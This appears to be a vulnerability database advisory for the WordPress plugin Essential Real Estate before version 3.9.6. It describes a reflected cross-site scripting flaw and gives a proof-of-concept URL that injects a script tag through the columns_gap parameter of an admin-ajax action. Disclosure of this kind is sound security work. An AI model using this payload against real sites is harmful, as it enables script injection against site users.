WordPress Plugin Vulnerabilities
Essential Real Estate < 3.9.6 - Reflected Cross-Site-Scripting
Description
The plugin does not sanitize and escapes some parameters, which could allow users with a role as low as Admin to perform Cross-Site Scripting attacks.
Proof of Concept
https://example.com/wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E%3C!--
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-11-17 (about 1 years ago)
Added
2022-11-17 (about 1 years ago)
Last Updated
2022-11-24 (about 1 years ago)